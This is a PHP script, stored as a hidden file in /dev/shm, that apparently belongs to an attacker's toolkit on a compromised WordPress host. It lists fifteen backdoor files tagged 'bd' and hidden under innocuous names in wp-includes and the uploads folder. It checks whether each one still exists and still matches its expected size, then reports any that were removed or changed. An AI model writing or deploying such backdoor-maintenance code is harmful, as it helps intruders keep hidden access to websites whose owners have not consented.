File: //dev/shm/.factor
<?php $r = '/home/protgmih/tourhill.com'; $x = ["/wp-includes/sodium_compat/src/PHP52/shop.php"=>"bd@@122633@@900",
"/wp-includeskk/blocks/file/view.min.php"=>"bd@@122634@@1094",
"/wp-includes/js/dist/script-modules/block-library/query/help_fields_edit.php"=>"bd@@122636@@1129",
"/wp-includes/blocks/gallery/topadmin.php"=>"bd@@122637@@874",
"/wp-includes/blocks/query-pagination-next/contactUs2.php"=>"bd@@122638@@885",
"/wp-includes/sodium_compat/src/Core32/UnderThesisProj.php"=>"bd@@108399@@1057",
"/wp-includes/sodium_compat/namespaced/Core/Poly1305/phpunit.php"=>"bd@@103025@@1016",
"/wp-includes/js/tinymce/plugins/lists/Link.inc.php"=>"bd@@103026@@881",
"/wp-includes/Requests/src/Exception/Transport/thumb.php"=>"bd@@94067@@935",
"/wp-includes/SimplePie/src/Decode/pageNavigation.php"=>"bd@@103027@@1063",
"/wp-includes/blocks/button/scheme.php"=>"bd@@103028@@937",
"/wp-includes/sodium_compat/src/Core/SecretStream/graphs.php"=>"bd@@94069@@942",
"/wp-includes/blocks/columns/tchinese_big5.php"=>"bd@@103029@@883",
"/wp-includes/sodium_compat/src/Core/ChaCha20/send_coupons.php"=>"bd@@94070@@973",
"/wp-content/uploads/2022/10/phpbb.inc.php"=>"bd@@94077@@922"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');